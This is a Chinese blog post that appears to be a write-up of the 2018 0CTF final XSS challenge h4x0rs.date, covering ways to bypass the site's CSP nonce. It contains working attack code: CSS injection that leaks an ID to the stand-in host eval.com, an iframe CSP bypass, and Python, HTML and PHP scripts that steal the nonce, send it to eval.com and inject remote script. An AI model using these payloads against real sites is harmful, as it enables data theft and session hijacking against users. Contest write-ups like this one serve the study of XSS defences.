<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="baidu-site-verification" content="L6Lm9d5Crl"/>
   
    <meta name="keywords" content="xss,nonce绕过,0ctf,csp" />
  
  
  
  
  <title>2018 0CTF final h4x0rs.date | 丶诺熙丨5am3</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="当时比赛时，差一点就解出来了。结束前半小时，才发觉获取nonce的漏洞点。 还是太菜了，否则能一跃第四。 这题其实挺有意思的， 赛后仔细想想，好像也不是太难。但是题目真心不错。 最后证实，这题有多种解法，但每一种解法，都感觉学到了很多。 题目链接：https:&#x2F;&#x2F;h4x0rs.date&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="2018 0CTF final h4x0rs.date">
<meta property="og:url" content="https://blog.5am3.com/2018/06/03/0ctf-final/index.html">
<meta property="og:site_name" content="丶诺熙丨5am3">
<meta property="og:description" content="当时比赛时，差一点就解出来了。结束前半小时，才发觉获取nonce的漏洞点。 还是太菜了，否则能一跃第四。 这题其实挺有意思的， 赛后仔细想想，好像也不是太难。但是题目真心不错。 最后证实，这题有多种解法，但每一种解法，都感觉学到了很多。 题目链接：https:&#x2F;&#x2F;h4x0rs.date&#x2F;">
<meta property="og:locale">
<meta property="og:image" content="https://img.5am3.com/img/180531/HdEkFhl6GE.png">
<meta property="article:published_time" content="2018-06-03T09:26:42.000Z">
<meta property="article:modified_time" content="2024-12-05T02:39:41.680Z">
<meta property="article:author" content="丶诺熙">
<meta property="article:tag" content="xss">
<meta property="article:tag" content="nonce绕过">
<meta property="article:tag" content="0ctf">
<meta property="article:tag" content="csp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img.5am3.com/img/180531/HdEkFhl6GE.png">
  
    <link rel="alternative" href="/atom.xml" title="丶诺熙丨5am3" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/avatar.jpg">
  
  
  
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
  
  
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        
        <script src="https://cdn.bootcdn.net/ajax/libs/require.js/2.1.6/require.min.js"></script>
        <script src="https://cdn.bootcdn.net/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <!-- <script type="text/javascript" src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script> -->
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/avatar.jpg" class="js-avatar">
            
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>
        
        
            <form>
                <input type="text" class="st-default-search-input search" id="local-search-input" placeholder=" Search...">
            </form>
            <div id="local-search-result"></div>
        
        
            <script type="text/javascript">
                (function() {
                    'use strict';
                    function getMatchData(keyword, data) {
                        var matchData = [];
                        for(var i =0;i<data.length;i++){
                            if(data[i].title.toLowerCase().indexOf(keyword)>=0) 
                                matchData.push(data[i])
                        }
                        return matchData;
                    }
                    var $input = $('#local-search-input');
                    var $resultContent = $('#local-search-result');
                    $input.keyup(function(){
                        $.ajax({
                            url: '/search.json',
                            dataType: "json",
                            success: function( json ) {
                                var str='<ul class=\"search-result-list\">';                
                                var keyword = $input.val().trim().toLowerCase();
                                $resultContent.innerHTML = "";
                                if ($input.val().trim().length <= 0) {
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                }
                                var results = getMatchData(keyword, json);
                                if(results.length === 0){
                                    $resultContent.empty();
                                    $('#switch-area').show();
                                    return;
                                } 
                                for(var i =0; i<results.length; i++){
                                    str += "<li><a href='"+ results[i].url +"' class='search-result-title'>"+ results[i].title +"</a></li>";
                                }
                                str += "</ul>";
                                $resultContent.empty();
                                $resultContent.append(str);
                                $('#switch-area').hide();
                            }
                        });
                    });
                })();
            </script>
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        
        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a  href="/">主页</a></li>
                        
                            <li><a  href="/archives/">归档</a></li>
                        
                            <li><a  href="/tags">标签</a></li>
                        
                            <li><a  href="/categories/">分类</a></li>
                        
                            <li><a  href="/about/">关于</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github"  target="_blank" href="https://github.com/5am3" title="github">github</a>
                            
                                <a class="fl weibo"  target="_blank" href="https://weibo.com/5am3" title="weibo">weibo</a>
                            
                                <a class="fl rss"  target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                                <a class="fl mail"  target="_blank" href="mailto://i@5am3.com" title="mail">mail</a>
                            
                                <a class="fl zhihu"  target="_blank" href="https://www.zhihu.com/people/5am3" title="zhihu">zhihu</a>
                            
                        </ul>
                    </nav>
                </section>
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/0ctf/" style="font-size: 10px;">0ctf</a> <a href="/tags/HEXO/" style="font-size: 12.5px;">HEXO</a> <a href="/tags/csp/" style="font-size: 10px;">csp</a> <a href="/tags/ctf/" style="font-size: 10px;">ctf</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/misc/" style="font-size: 12.5px;">misc</a> <a href="/tags/nodejs/" style="font-size: 10px;">nodejs</a> <a href="/tags/nonce%E7%BB%95%E8%BF%87/" style="font-size: 10px;">nonce绕过</a> <a href="/tags/web/" style="font-size: 15px;">web</a> <a href="/tags/web%E6%B8%97%E9%80%8F/" style="font-size: 10px;">web渗透</a> <a href="/tags/writeup/" style="font-size: 20px;">writeup</a> <a href="/tags/writeup-web-xss/" style="font-size: 10px;">writeup - web - xss</a> <a href="/tags/xman/" style="font-size: 12.5px;">xman</a> <a href="/tags/xss/" style="font-size: 17.5px;">xss</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" style="font-size: 10px;">漏洞挖掘</a> <a href="/tags/%E8%A2%AB%E5%8A%A8%E6%89%AB%E6%8F%8F/" style="font-size: 10px;">被动扫描</a> <a href="/tags/%E9%9D%A2%E8%AF%95/" style="font-size: 10px;">面试</a>
                    </div>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                
                    <div id="js-aboutme">一个热爱安全的小渣渣！</div>
                </section>
                
            </div>
        </div>
    </header>
</div>

    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/avatar.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">归档</a></li>
                
                    <li><a href="/tags">标签</a></li>
                
                    <li><a href="/categories/">分类</a></li>
                
                    <li><a href="/about/">关于</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/5am3" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="https://weibo.com/5am3" title="weibo">weibo</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                        <a class="mail" target="_blank" href="mailto://i@5am3.com" title="mail">mail</a>
                    
                        <a class="zhihu" target="_blank" href="https://www.zhihu.com/people/5am3" title="zhihu">zhihu</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-0ctf-final" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a  href="/2018/06/03/0ctf-final/" class="article-date">
      <time datetime="2018-06-03T09:26:42.000Z" itemprop="datePublished">2018-06-03</time>
</a>

    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      2018 0CTF final h4x0rs.date
    </h1>
  


      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/writeup/">writeup</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/0ctf/" rel="tag">0ctf</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/csp/" rel="tag">csp</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nonce%E7%BB%95%E8%BF%87/" rel="tag">nonce绕过</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/xss/" rel="tag">xss</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>当时比赛时，差一点就解出来了。结束前半小时，才发觉获取nonce的漏洞点。</p>
<p>还是太菜了，否则能一跃第四。</p>
<p>这题其实挺有意思的， 赛后仔细想想，好像也不是太难。但是题目真心不错。</p>
<p>最后证实，这题有多种解法，但每一种解法，都感觉学到了很多。</p>
<p>题目链接：<a href="https://h4x0rs.date/">https://h4x0rs.date/</a></p>
<span id="more"></span>

<p>由于这篇题解自己拖得时间有点长了，所以刚刚发现 lorexxar大佬的题解写的很棒了，大家可以看一下，我就不过多介绍题目了。而且我尽量写一些与他不同的。</p>
<p><a href="https://www.lorexxar.cn/2018/05/31/0ctf2018-final/#h4x0rs-data">https://www.lorexxar.cn/2018/05/31/0ctf2018-final/#h4x0rs-data</a></p>
<h2 id="获取ID"><a href="#获取ID" class="headerlink" title="获取ID"></a>获取ID</h2><p>我们是通过一个比较简单的方式获取到的id。题目中存在一个id为msg标签可写内容。此时我们将自己资料改为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">style</span> <span class="attr">id</span>=<span class="string">msg</span>&gt;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后构造链接report即可</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://h4x0rs.date/login.php?redict=profile.php?id=&#123;you_id&#125;%26msg=body&#123;background-img:url(&#x27;//eval.com?id=</span><br></pre></td></tr></table></figure>



<h2 id="【非预期】通过iframe控制csp"><a href="#【非预期】通过iframe控制csp" class="headerlink" title="【非预期】通过iframe控制csp"></a>【非预期】通过iframe控制csp</h2><p>这个解法是刷出题人Twitter刷到的。</p>
<p><img src="https://img.5am3.com/img/180531/HdEkFhl6GE.png" alt="mark"></p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>因为题目本身是通过加载js，来实现csp的加载。此时csp是直接写到内容中的。可以影响到此标签后面的js的加载。（前面的无法影响）</p>
<p>所以，此时我们只要能提前想办法不让这个js加载即可。当时自己也是想过的，然而……没办法。</p>
<p>在这里，这位大佬用了iframe标签的csp属性。（貌似只有chrome可以用）</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>此时我们先构造user1的资料为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1);<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后再构造user2的资料为如下，从而加载恶意代码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">/profile.php?id</span>=<span class="string">user1_ID</span> <span class="attr">csp</span>=<span class="string">&quot;script-src &#x27;unsafe-inline&#x27;;&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>此时，当我们访问user2资料时，便成功触发漏洞。</p>
<h2 id="【预期】拿到nonce，执行js"><a href="#【预期】拿到nonce，执行js" class="headerlink" title="【预期】拿到nonce，执行js"></a>【预期】拿到nonce，执行js</h2><p><a href="https://paper.seebug.org/166/#a-csscspdom-xss-three-way">https://paper.seebug.org/166/#a-csscspdom-xss-three-way</a></p>
<p>之前自己一直想的是通过style来拿nonce，因为他有缓存。而且时间还可以。最后自己努力将时间控制在15s左右。但是发过去后发现，那边没有回显？自己chrome是66，bot是65。当时很迷，还问出题人来着。但出题人没有对这块进行答复，而是反问我，时间问题。并且说明bot只停留15s，你这样是不行的。</p>
<p>所以只好换思路。当时不知道脑子那根筋抽了，没想到自己加载他的js。最后比赛结束前半小时才发现这个问题。</p>
<p>然而因为需要一系列自动化脚本的编写。最终也没来得及写完。比赛结束后才勉强写出beta版本。</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>此时因为缓存的原因，20s的缓存。也就是说，当前页面的静态文件时不会重新加载的。那么，我们在当前页面加载一个iframe，即<strong>eval.php</strong>，去加载js从而获取nonce。但是获取nonce需要传入id。</p>
<p>因为此时我们已经成功关注了admin，所以可以通过python在自己页面爬取到admin的id。</p>
<p>此时大概逻辑便有了。</p>
<p>1.获取到管理员id，并且传给服务器，保存到a.txt。</p>
<p>2.将user1的资料改为将eval.php作为iframe加载。eval.php会引入a.txt的id。</p>
<p>3.此时eval.php 成功拿到nonce，保存到b.txt。并且在5秒后加载user2的资料</p>
<p>4.紧接着，修改user2 的资料，写入evaljs，并且将b.txt中的nonce带上。</p>
<p>5.此时，一套流程便完成了。等待evaljs的执行即可。</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><p>大概用了以下几个脚本。写完没来得及做测试环境就关了。最近虽然环境一直开着，但是有些事给耽误复现了。</p>
<p>也就是说…..至今还未复现。</p>
<p><strong>poc.py</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取管理员id</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getAdminid</span>():</span><br><span class="line">    <span class="keyword">return</span> re.search(<span class="string">&quot;id=([0-9a-zA-Z]*)\&quot;&gt;admin2&lt;&quot;</span> , requests.get(<span class="string">&quot;https://h4x0rs.date/profile.php&quot;</span> , cookies=&#123;<span class="string">&quot;PHPSESSID&quot;</span>:<span class="string">&quot;p28vu9m2h0uj7g04m73uo4fsm6&quot;</span>&#125;).text).group(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 从服务器端a.txt获取nonce</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getNonce</span>():</span><br><span class="line">	<span class="keyword">return</span> requests.get(<span class="string">&quot;http://eval.com/a.txt&quot;</span>).text</span><br><span class="line"></span><br><span class="line"><span class="comment"># 修改资料页内容</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">reProfile</span>(<span class="params">ec</span>):</span><br><span class="line">	url=<span class="string">&quot;https://h4x0rs.date/profile.php&quot;</span></span><br><span class="line">	cookie=</span><br><span class="line">	headers=&#123;</span><br><span class="line">		<span class="string">&quot;Cookie&quot;</span>:<span class="string">&quot;PHPSESSID=8fut6nfo8f449hu3t6ft2qp3s3&quot;</span>,</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	data=&#123;</span><br><span class="line">		<span class="string">&quot;intro&quot;</span>:ec,</span><br><span class="line">		<span class="string">&quot;submit&quot;</span>:<span class="string">&quot;submit&quot;</span>,</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">print</span>(ec)</span><br><span class="line">	r=requests.post(url,data=data,headers=headers)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 发送report</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sendReport</span>():</span><br><span class="line">	codeurl=<span class="string">&quot;https://h4x0rs.date/profile.php?id=428222d40f05cfc8f1a1f2b550b29952db37d2016899a9f2e0534f630739c1e4&quot;</span></span><br><span class="line">	requests.post(<span class="string">&quot;https://h4x0rs.date/do_report.php&quot;</span>,data=&#123;<span class="string">&quot;url&quot;</span>: codeurl,<span class="string">&quot;submit&quot;</span>: <span class="string">&quot;submit&quot;</span>&#125; , cookies=&#123;<span class="string">&quot;PHPSESSID&quot;</span>:<span class="string">&quot;p28vu9m2h0uj7g04m73uo4fsm6&quot;</span>&#125;)</span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot;send url ok!&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 修改user2资料页中的nonce</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">changeNonce</span>(<span class="params">nonce</span>):</span><br><span class="line">	evalcode=<span class="string">&quot;&lt;script src=//eval.com/eval.js nonce=&#x27;&quot;</span>+nonce+<span class="string">&quot;&#x27;&#x27;&gt;&lt;/script&gt;&quot;</span></span><br><span class="line">	reProfile(evalcode)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 首先获取到admin的id，并保存到b.txt</span></span><br><span class="line"><span class="built_in">id</span> = getAdminid()</span><br><span class="line">requests.get(<span class="string">&quot;http://eval.com/save_b.php?b=&quot;</span>+<span class="built_in">id</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#发送report，从而加载eval.php</span></span><br><span class="line">sendReport()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取nonce，并修改内容。</span></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">	nonce=getNonce()</span><br><span class="line">	<span class="keyword">if</span>(nonce !=<span class="string">&#x27;&#x27;</span>):</span><br><span class="line">		changeNonce(nonce)</span><br><span class="line">	time.sleep(<span class="number">0.5</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><strong>eval.php</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">	&lt;title&gt;eval&lt;/title&gt;</span><br><span class="line">	&lt;script src=&quot;https://h4x0rs.date/assets/jquery-3.3.1.min.js&quot;&gt;&lt;/script&gt;</span><br><span class="line">	&lt;script&gt;</span><br><span class="line">         // 加载user2的资料页</span><br><span class="line">		function aa()&#123;</span><br><span class="line">			var iframe = document.createElement(&#x27;iframe&#x27;); </span><br><span class="line">			iframe.src=&quot;https://h4x0rs.date/profile.php?id=1d70f9cca4ab0d188c0cc9524b0d92705607d9b0d2e3923841e8b194ac7601cc&quot;;  </span><br><span class="line">			document.body.appendChild(iframe);</span><br><span class="line">		&#125;</span><br><span class="line">        </span><br><span class="line">         </span><br><span class="line">		$(document).ready( function () &#123;</span><br><span class="line">		  //获取nonce</span><br><span class="line">           var m = $(&quot;meta[http-equiv=Content-Security-Policy]&quot;);</span><br><span class="line">		  var nonce=m.attr(&quot;content&quot;);</span><br><span class="line"></span><br><span class="line">		  // 通过savea.php将nonce保存为a.txt</span><br><span class="line">           var url=&quot;https://eval.com/save_a.php?a=&quot;;</span><br><span class="line">		  var n0t = document.createElement(&quot;link&quot;);</span><br><span class="line">		  n0t.setAttribute(&quot;rel&quot;, &quot;prefetch&quot;);</span><br><span class="line">		  n0t.setAttribute(&quot;href&quot;, url+nonce);</span><br><span class="line">		  document.head.appendChild(n0t);</span><br><span class="line">           </span><br><span class="line">           //每3秒重新加载一次user2的资料</span><br><span class="line">		  setInterval(&quot;aa()&quot;, 3000 )</span><br><span class="line">		&#125;);</span><br><span class="line">	&lt;/script&gt;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">	&lt;script type=&quot;text/javascript&quot; src=&quot;https://h4x0rs.date/assets/csp.js?id=&lt;?php echo file_get_contents(&#x27;b.txt&#x27;);?&gt;&amp;page=profile.php&quot;&gt;&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><strong>save_a.php</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$myfile</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;./a.txt&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">fwrite</span>(<span class="variable">$myfile</span>, <span class="variable">$str</span>);</span><br><span class="line">    <span class="title function_ invoke__">fclose</span>(<span class="variable">$myfile</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">save</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p><strong>save_b.php</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$myfile</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;./b.txt&quot;</span>, <span class="string">&quot;w&quot;</span>);</span><br><span class="line">    <span class="title function_ invoke__">fwrite</span>(<span class="variable">$myfile</span>, <span class="variable">$str</span>);</span><br><span class="line">    <span class="title function_ invoke__">fclose</span>(<span class="variable">$myfile</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">save</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>]);</span><br></pre></td></tr></table></figure>



<h2 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h2><p>这道题蛮棒的，话说l4wio大佬总是一次又一次刷新自己对xss的认识。最近0ctf，学到了很多套路。再一次感觉到xss的乐趣。想尽一切办法去bypass。但是切记不能忽视任何一个微小的细节。或许哪里就会是一个漏洞。</p>
<p>看过标答后，发现l4wio大佬的答案更有意思一点，在这里，我用了两个用户，而大佬，直接通过csrf修改admin资料，将admin作为第二个用户来构造xss。膜一下。</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li><a href="https://www.lorexxar.cn/2018/05/31/0ctf2018-final/#h4x0rs-data">https://www.lorexxar.cn/2018/05/31/0ctf2018-final/#h4x0rs-data</a></li>
<li><a href="https://github.com/l4wio/CTF-challenges-by-me/blob/master/0ctf_final-2018/0ctf_tctf_2018_slides.pdf">https://github.com/l4wio/CTF-challenges-by-me/blob/master/0ctf_final-2018/0ctf_tctf_2018_slides.pdf</a></li>
</ul>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a  href="/2018/06/03/0ctf-final/">2018 0CTF final h4x0rs.date</a></p>
        <p><span>文章作者:</span><a  href="/" title="访问  的个人博客"></a></p>
        <p><span>发布时间:</span>2018年06月03日 - 17时26分</p>
        <p><span>最后更新:</span>2024年12月05日 - 02时39分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2018/06/03/0ctf-final/" title="2018 0CTF final h4x0rs.date">https://blog.5am3.com/2018/06/03/0ctf-final/</a>
            <span class="copy-path" data-clipboard-text="原文: https://blog.5am3.com/2018/06/03/0ctf-final/　　作者: " title=""></span>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a  href="/2018/07/04/GourdScan_V2/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          GourdScan V2 配置安全及使用
        
      </div>
    </a>
  
  
    <a  href="/2018/05/04/web-testing-one/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">记一次简单的渗透测试</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>


  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
